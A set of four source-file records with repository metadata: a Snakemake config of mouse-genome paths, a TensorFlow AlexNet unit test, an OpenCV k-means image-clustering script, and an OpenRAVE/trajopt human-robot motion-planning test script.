b548b9f7cdadb399f27f06b74930780a08061e79 | 05d5945350fe64f6c1235d4f12ee22323167ca0c | /snakemake/configs/mm10_SRP044873.py | d77054f2e20301267d8ba829038dad7ea369643b | [
"BSD-2-Clause"
] | permissive | saketkc/re-ribo-smk | 674d4423830bbae3a32f46146ffd362514047a60 | c9326cbafdfa060e22e9af692d9146c37f5035ba | refs/heads/master | 2021-07-12T18:46:37.772947 | 2020-05-30T01:41:13 | 2020-05-30T01:41:13 | 148,952,525 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py | RAWDATA_DIR = '/staging/as/skchoudh/re-ribo-datasets/mm10/SRP044873'
OUT_DIR = '/staging/as/skchoudh/re-ribo-analysis/mm10/SRP044873'
GENOME_FASTA = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.fa'
CHROM_SIZES = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.sizes'
STAR_INDEX = '/home/cmb-06/as/skchoudh/genomes/mm10/star_annotated_ribopod'
GTF_VERSION = 'v96'
GTF = '/home/cmb-06/as/skchoudh/genomes/mm10/annotation/Mus_musculus.GRCm38.96.chr_patch_hapl_scaff.gtf'
GENE_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/gene.bed.gz'
STAR_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/start_codon.bed.gz'
STOP_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/stop_codon.bed.gz'
CDS_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/cds.bed.gz'
UTR5_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr5.bed.gz'
UTR3_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr3.bed.gz'
INTRON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/intron.bed.gz'
ORIENTATIONS = ['5prime', '3prime']
STRANDS = ['pos', 'neg', 'combined']
FRAGMENT_LENGTHS = range(18, 39)
RIBOTRICER_ANNOTATION_PREFIX = '/home/cmb-06/as/skchoudh/genomes/mm10/ribotricer_v96_annotation_longest'
| [
"saketkc@gmail.com"
] | saketkc@gmail.com |
e73bd41c33e69aa417fab4dffaa549a7814efb51 | 9a73c54526082c27e5c5d88bd54950a589233658 | /DeepLearning/Verification_code_identification/nets/alexnet_test.py | f0dc38b9c9f6f80166eb10b496695e7ac63d676d | [
"Apache-2.0"
] | permissive | archu2020/python-2 | af78b65ed7f3ad17f71d4f8a97c002df86908298 | 19c626ca9fd37168db8a7ac075fd80c8e2971313 | refs/heads/master | 2022-12-27T12:08:44.316760 | 2020-10-02T15:46:27 | 2020-10-02T15:46:27 | 300,660,839 | 0 | 0 | Apache-2.0 | 2020-10-02T15:46:28 | 2020-10-02T15:37:58 | Python | UTF-8 | Python | false | false | 5,964 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for slim.nets.alexnet."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nets import alexnet
slim = tf.contrib.slim
class AlexnetV2Test(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/squeezed')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testFullyConvolutional(self):
batch_size = 1
height, width = 300, 400
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes, spatial_squeeze=False)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 4, 7, num_classes])
def testEndPoints(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
_, end_points = alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1',
'alexnet_v2/pool1',
'alexnet_v2/conv2',
'alexnet_v2/pool2',
'alexnet_v2/conv3',
'alexnet_v2/conv4',
'alexnet_v2/conv5',
'alexnet_v2/pool5',
'alexnet_v2/fc6',
'alexnet_v2/fc7',
'alexnet_v2/fc8'
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
def testModelVariables(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1/weights',
'alexnet_v2/conv1/biases',
'alexnet_v2/conv2/weights',
'alexnet_v2/conv2/biases',
'alexnet_v2/conv3/weights',
'alexnet_v2/conv3/biases',
'alexnet_v2/conv4/weights',
'alexnet_v2/conv4/biases',
'alexnet_v2/conv5/weights',
'alexnet_v2/conv5/biases',
'alexnet_v2/fc6/weights',
'alexnet_v2/fc6/biases',
'alexnet_v2/fc7/weights',
'alexnet_v2/fc7/biases',
'alexnet_v2/fc8/weights',
'alexnet_v2/fc8/biases',
]
model_variables = [v.op.name for v in slim.get_model_variables()]
self.assertSetEqual(set(model_variables), set(expected_names))
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testTrainEvalWithReuse(self):
train_batch_size = 2
eval_batch_size = 1
train_height, train_width = 224, 224
eval_height, eval_width = 300, 400
num_classes = 1000
with self.test_session():
train_inputs = tf.random_uniform(
(train_batch_size, train_height, train_width, 3))
logits, _ = alexnet.alexnet_v2(train_inputs)
self.assertListEqual(logits.get_shape().as_list(),
[train_batch_size, num_classes])
tf.get_variable_scope().reuse_variables()
eval_inputs = tf.random_uniform(
(eval_batch_size, eval_height, eval_width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False,
spatial_squeeze=False)
self.assertListEqual(logits.get_shape().as_list(),
[eval_batch_size, 4, 7, num_classes])
logits = tf.reduce_mean(logits, [1, 2])
predictions = tf.argmax(logits, 1)
self.assertEquals(predictions.get_shape().as_list(), [eval_batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
if __name__ == '__main__':
tf.test.main()
| [
"767786685@qq.com"
] | 767786685@qq.com |
6a4c0e5527f69fcc427eb1363b72c582e7260e58 | 4adbc552e5f442f9b6f0a36c33bbac2966dbc830 | /K_means.py | ed92ba2d74df6d67004810108b839956ccd49700 | [] | no_license | ashenafin/Plant_health_indication- | b4241800abe0c9c974ff2af4b917d11198b1cd2d | dd47d4f4c27577b5f1cd1a3df57e1929dbd2f0d4 | refs/heads/master | 2020-04-10T05:34:47.888342 | 2018-12-25T12:56:30 | 2018-12-25T12:56:30 | 160,831,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,155 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 19 23:03:21 2018
@author: Ashe
"""
import numpy as np
import cv2
def main():
path = "C:\\Users\\Ashe\\Desktop\\Books\\Semester project\\min\\"
imgpath = path + "1.13.jpg"
img = cv2.imread(imgpath,1)
r = 512.0 / img.shape[1]
dim = (512, int(img.shape[0] * r))
img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)
#img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
z=img.reshape((-1,3))
z=np.float32(z)
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
k=3
ret, lebel, center = cv2.kmeans(z, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
center = np.uint8(center)
res = center[lebel.flatten()]
output = res.reshape((img.shape))
cv2.imwrite("C:\\Users\\Ashe\\Desktop\\Books\\Semester project\\min\\k_mean.tiff", output)
for i in range(1):
cv2.imshow('clusterd', output)
cv2.waitKey(0)
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | ashenafin.noreply@github.com |
cdd6442d846d0f5fbf1100ba2bf46fbc14addba5 | 02a95abdce2e7842c1280af9792fdaf030182836 | /task_breakdown_openrave/human_robot_test.py | 6d01159c9daeca557b68f9b0d9a500c2cbc63bb8 | [] | no_license | Anto09/task_breakdown_openrave | 270531a2dd0f460e80603b1b09ccd09cb3cdf00e | 2ab820ce7a3c5e47ffd336124f52c6a4d40f84bc | refs/heads/master | 2020-09-03T01:47:10.017260 | 2019-11-04T17:56:36 | 2019-11-04T17:56:36 | 219,354,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,501 | py | #!/usr/bin/env python
import sys
import os
import rospy
from baxter_moveit_test.srv import *
import time
import threading
import openravepy
#### YOUR IMPORTS GO HERE ####
import sys
from taskbreakdown_python import *
from utilities import Utilities
import math
import trajoptpy
import trajoptpy.kin_utils as ku
#### END OF YOUR IMPORTS ####
from openravepy import ikfast
if not __openravepy_build_doc__:
from openravepy import *
from numpy import *
from openravepy.misc import InitOpenRAVELogging
import geometry_msgs.msg
from geometry_msgs.msg import *
import transformations
import numpy as np
from utilities import Utilities
from human_robot import HumanRobot
from costwrapper import *
import TransformMatrix
import numpy as np
import math
import copy
import sys
from human_trajopt import HumanTrajopt
MAX_VAL = 180
class CostRegion:
dim = 7
vertices = np.zeros(shape=(7,2))
center = np.zeros(7)
cost = np.zeros(7)
total_cost = 0
def init(self, vertices):
self.vertices = vertices
def calc_center(self):
for d in range(0, self.dim):
self.center[d] = (self.vertices[d][1] + self.vertices[d][0])*0.5
def get_dist_center(self, config):
return np.linalg.norm(config - self.center)
def get_dist_boundary(self, config):
dist = 0;
for c in range(0,self.dim):
dist = min(min(np.fabs(self.vertices[c][0] - config[c]), np.fabs(self.vertices[c][1] - config[c])), dist)
return dist
def set_cost(self, c1, c2, c3, c4, c5, c6, c7):
self.cost[0] = c1
self.cost[1] = c2
self.cost[2] = c3
self.cost[3] = c4
self.cost[4] = c5
self.cost[5] = c6
self.cost[6] = c7
self.total_cost = np.sum(self.cost)
def inside_region(self, config):
inside = True
for i in range(0, self.dim):
inside = inside and config[i] >= self.vertices[i][0] and config[i] <= self.vertices[i][1]
return inside
def is_neighbor(self, cost_region):
neighbor = True
for i in range(0, self.dim):
c_dist = np.fabs(self.center[i] - cost_region.center[i])
extents_a = np.fabs(self.vertices[i][0] - self.vertices[i][1]) * 0.5
extents_b = np.fabs(cost_region.vertices[i][0] - cost_region.vertices[i][1]) * 0.5
neighbor = neighbor and np.fabs((extents_b + extents_a) - c_dist) > sys.float_info.epsilon
return neighbor
def str2num(string):
return array([float(s) for s in string.split()])
def generate_ik_solver(robotfile, filename):
# for generating ik solver
env = Environment()
kinbody = env.ReadRobotXMLFile(robotfile)
env.Add(kinbody)
solver = ikfast.IKFastSolver(kinbody=kinbody)
chaintree = solver.generateIkSolver(baselink=0,eelink=16,freeindices=[5],solvefn=ikfast.IKFastSolver.solveFullIK_6D)
code = solver.writeIkSolver(chaintree)
open(filename,'w').write(code)
def make_fullbody_request(end_t, n_steps, manip_name, end_joint_target):
coll_coeff = 20
dist_pen = .05
d = {
"basic_info" : {
"n_steps" : n_steps,
"manip" : manip_name,
"start_fixed" : True
},
"costs" : [
{
"type" : "joint_vel",
"params": {"coeffs" : [1]}
},
{
"name" : "cont_coll",
"type" : "collision",
"params" : {"coeffs" : [coll_coeff],"dist_pen" : [dist_pen], "continuous":True}
},
{
"name": "disc_coll",
"type" : "collision",
"params" : {"coeffs" : [coll_coeff],"dist_pen" : [dist_pen], "continuous":False}
}
],
"constraints" : [
{
"type" : "pose",
"params" : {"xyz" : end_t[0:3,3].tolist(),
"wxyz" : transformations.quaternion_from_matrix(end_t[0:3,0:3]).tolist(),
"link": "Head",
"timestep" : n_steps-1
}
}
],
"init_info" : {
"type" : "straight_line",
"endpoint" : end_joint_target.tolist()
}
}
return d
def ExtendTrajoptRequest(request, waypoints):
idx = 1
for waypoint in waypoints:
print 'waypoint rot target', transformations.quaternion_from_matrix(waypoint[0:3,0:3]).tolist()
request["constraints"].extend([
{
"type":"pose",
"name":"path_pose_waypoint",
"params":{
"xyz": waypoint[0:3,3].tolist(),
"wxyz": transformations.quaternion_from_matrix(waypoint[0:3,0:3]).tolist(),
"link": "Head",
"timestep": idx
}
}
])
idx += 1
return request
def CalcKneeAnkleAngles(self, hip_trans, knee_trans, ankle_trans):
l1 = np.linalg.norm(knee_trans[0:3,3] - ankle_trans[0:3,3])
l2 = np.linalg.norm(hip_trans[0:3,3] - knee_trans[0:3,3])
p2x = hip_trans[0,3]
p2y = hip_trans[1,3]
#q2 calculation
c2 = (p2x**2 + p2y**2 - l1**2 - l2**2)/(2*l1*l2)
s2_1 = np.sqrt(1-c2**2)
s2_2 = -np.sqrt(1-c2**2)
s2 = s2_1
q2 = np.arctan2(s2_1, c2)
if (q2 < 0):
s2 = s2_2
q2 = np.arctan2(s2_2, c2)
#q1 calculation
det = (l1**2 + l2**2 + (2*l1*l2*c2))
s1 = (p2y*(l1+l2*c2) - p2x*l2*s2)/det
c1 = (p2x*(l1+l2*c2) + p2y*l2*s2)/det
q1 = np.arctan2(s1,c1)
return q1,q2
if __name__ == "__main__":
env = Environment()
env.SetViewer('qtcoin')
env.Reset()
env.Load("/home/anto/ebolabot_ws/src/task_breakdown_openrave/src/task_breakdown_openrave/kinbodies_robots_envs/human_test.env.xml")
time.sleep(0.1)
utils = Utilities()
ht = HumanTrajopt()
ht.generate_cost_regions()
support_path = [np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.43935400e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 1.90673274e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.43966000e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.44859184e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -3.64438239e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.43918493e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.45782661e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -8.68824824e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.44161176e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.46704921e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 5.18953957e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.44693812e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.47625052e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 5.18953957e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.45515873e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.48597668e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 3.29451152e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.27259951e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.49390442e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -3.64438239e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 6.08676014e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50000290e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -1.05832763e-16],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.89934116e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50425743e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -5.03216117e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.71206335e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50666961e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -7.80771873e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.52665244e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50725727e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 3.29451152e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.34482372e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50605433e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -5.03216117e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.16826688e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50311047e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 5.18953957e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.99863093e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.49849071e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 1.90673274e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.83750959e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.49227478e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 3.29451152e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.68642708e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.50995946e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 5.18953957e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.73983830e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.52727387e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -8.68824824e-18],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.80424842e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.54414968e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -2.25660360e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.87940325e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.56052030e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 1.90673274e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 4.96500620e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.57632110e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 3.29451152e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.06071941e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.59789082e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -7.80771873e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.33132057e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.61643961e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -1.61343914e-16],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.62000174e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]),
np.array([[ -1.00000000e+00, -1.22464680e-16, 0.00000000e+00, 1.63178582e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, -6.41993995e-17],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 5.92300731e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])]
InitOpenRAVELogging()
robot = env.GetRobots()[0]
head = robot.GetLink('Head')
print 'head_transform'
print head.GetTransform()
manip = robot.SetActiveManipulator("torso")
robot.SetActiveDOFs(manip.GetArmIndices())
ikmodel = openravepy.databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterizationType.Transform6D)
if not ikmodel.load():
ikmodel.autogenerate()
print ('done torso manip')
print 'MANIP DOFS', robot.GetActiveDOFIndices()
# manip = robot.SetActiveManipulator("base")
# robot.SetActiveDOFs(manip.GetArmIndices())
# ikmodel = openravepy.databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterizationType.Transform6D)
# if not ikmodel.load():
# ikmodel.autogenerate()
# print ('done base manip')
# manip = robot.SetActiveManipulator("knee")
# robot.SetActiveDOFs(manip.GetArmIndices())
# ikmodel = openravepy.databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterizationType.Transform6D)
# if not ikmodel.load():
# ikmodel.autogenerate()
# print ('done knee manip')
probs_cbirrt = RaveCreateProblem(env,'CBiRRT')
env.LoadProblem(probs_cbirrt,'Human1')
serialized_transform = TransformMatrix.SerializeTransform(support_path[len(support_path)-1])
raw_input("Press enter to continue...")
handles = []
for sp in support_path:
sp[0:3,3] += np.array([0.034094, 0.004925, 0.088688])
sp[0:3,3] += np.array([-0.026786, 0, 0])
handles.append(env.plot3(points=sp[0:3,3],
pointsize=5.0,
colors=array(((0,1,0)))))
raw_input("Press enter to continue...")
# for i in range(0, len(support_path)):
# pt = np.copy(support_path[i])
# pt[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
# pt[0:3,3] -= np.array([-0.026786, 0, 0])
# serialized_transform = TransformMatrix.SerializeTransform(pt)
# with env:
# startik = str2num(probs_cbirrt.SendCommand('DoGeneralIK exec nummanips 1 maniptm 0 %s'%serialized_transform))
# print ('ik solution \n', startik)
# raw_input("Press enter to continue...")
# gr = GogglesRobot()
# goggles = env.GetRobots()[1]
# gr.Init(env, goggles)
# goggles.SetActiveDOFValues([0])
# gr.Collapse()
head_transform = manip.GetEndEffector().GetTransform()
new_head_transform = np.copy(head_transform)
new_head_transform[0,3] += 0.2
new_head_transform[2,3] -= 0.1
baxter = env.GetRobots()[1]
b_manip = baxter.SetActiveManipulator("rightarm")
b_sol = []
goggles_trans = np.array([[ -6.12323400e-17, -7.49879891e-33, 1.00000000e+00, 1.15732000e+00],
[ 1.22464680e-16, -1.00000000e+00, 0.00000000e+00, 0.00000000e+00],
[ 1.00000000e+00, 1.22464680e-16, 6.12323400e-17, 7.32410000e-01],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]]
)
with env:
b_sol = ku.ik_for_link(goggles_trans, b_manip, b_manip.GetEndEffector().GetName(),
filter_options = IkFilterOptions.IgnoreEndEffectorCollisions,
return_all_solns = True)
if (len(b_sol) > 0):
baxter.SetActiveDOFs(b_manip.GetArmIndices())
baxter.SetActiveDOFValues(b_sol[0])
# sol = []
# with env:
# sol = ku.ik_for_link(new_head_transform, manip, manip.GetEndEffector().GetName(),
# filter_options = IkFilterOptions.IgnoreSelfCollisions | IkFilterOptions.CheckEnvCollisions,
# return_all_solns = True)
# print "solutions",sol
# for s in sol:
# with env:
# robot.SetActiveDOFs(manip.GetArmIndices())
# robot.SetActiveDOFValues(s)
# raw_input("Press enter to continue...")
# hr = HumanRobot()
# hr.Init(env, robot)
# hr.TestTrajopt()
# generate_ik_solver('/home/anto/ebolabot_ws/src/task_breakdown_openrave/src/task_breakdown_openrave/human_bio_two_arms_mod.xml',
# '/home/anto/ebolabot_ws/src/task_breakdown_openrave/src/task_breakdown_openrave/human_head_ik.cpp', )
raw_input("Press enter to continue...")
manip = robot.SetActiveManipulator("torso")
target = support_path[len(support_path)-1]
target[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
target[0:3,3] -= np.array([-0.026786, 0, 0])
sol = ku.ik_for_link(target, manip, manip.GetEndEffector().GetName(),
filter_options = IkFilterOptions.IgnoreSelfCollisions | IkFilterOptions.CheckEnvCollisions,
return_all_solns = False)
request = make_fullbody_request(support_path[len(support_path)-1], len(support_path), "torso", sol)
c_waypoints = []
# for i in range(0, len(support_path)-1):
# waypoint = np.copy(support_path[i])
# waypoint[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
# waypoint[0:3,3] -= np.array([-0.026786, 0, 0])
# c_waypoints.append(waypoint)
# request = ExtendTrajoptRequest(request, c_waypoints)
print request
s = json.dumps(request) # convert dictionary into json-formatted string
cost_handles = []
with env:
prob = trajoptpy.ConstructProblem(s, env) # create object that stores optimization problem
waypoints = []
for i in range(0, len(support_path)-1):
waypoint = np.copy(support_path[i])
waypoint[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
waypoint[0:3,3] -= np.array([-0.026786, 0, 0])
waypoints.append(waypoint)
co = CostObject()
co.Init(waypoint, None, env, robot, utils, manip, None, None)
if (i > 0):
co.parent_node = cost_handles[i-1]
co.parent_node.child_node = co
cost_handles.append(co)
prob.AddCost(co.TaskDeviationCost, [(i,j) for j in xrange(7)], "ABS")#, "up%i"%t)
prob.AddCost(ht.get_gradient_cost, [(i,j) for j in xrange(7)], "ABS")
traj = None
with env:
result = trajoptpy.OptimizeProblem(prob) # do optimization
traj = result.GetTraj()
print traj
robot.SetActiveDOFs(manip.GetArmIndices())
for t in traj:
with env:
robot.SetActiveDOFValues(t)
pt = manip.GetEndEffector().GetTransform()
pt[0:3,3] += np.array([0.034094, 0.004925, 0.088688])
pt[0:3,3] += np.array([-0.026786, 0, 0])
handles.append(env.plot3(points=pt[0:3,3],
pointsize=5.0,
colors=array(((0,0,1)))))
raw_input("Press enter to continue...")
# for sp_trans in support_path:
# sp = np.copy(sp_trans)
# sp[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
# sp[0:3,3] -= np.array([-0.026786, 0, 0])
# # sp[0:3,3] -= np.array([0.034094, 0.004925, 0.088688])
# manip = robot.SetActiveManipulator("torso")
# sol = []
# with env:
# sol = ku.ik_for_link(sp, manip, manip.GetEndEffector().GetName(),
# filter_options = IkFilterOptions.IgnoreSelfCollisions | IkFilterOptions.CheckEnvCollisions,
# return_all_solns = False)
# if (len(sol) > 0):
# with env:
# robot.SetActiveDOFs(manip.GetArmIndices())
# robot.SetActiveDOFValues(sol)
# else:
# manip = robot.SetActiveManipulator("base")
# with env:
# sol = ku.ik_for_link(sp, manip, manip.GetEndEffector().GetName(),
# filter_options = IkFilterOptions.IgnoreSelfCollisions | IkFilterOptions.CheckEnvCollisions,
# return_all_solns = False)
# if (len(sol) > 0):
# with env:
# robot.SetActiveDOFs(manip.GetArmIndices())
# robot.SetActiveDOFValues(sol)
# pt = manip.GetEndEffector().GetTransform()
# pt[0:3,3] += np.array([0.034094, 0.004925, 0.088688])
# pt[0:3,3] += np.array([-0.026786, 0, 0])
# handles.append(env.plot3(points=pt[0:3,3],
# pointsize=5.0,
# colors=array(((0,0,1)))))
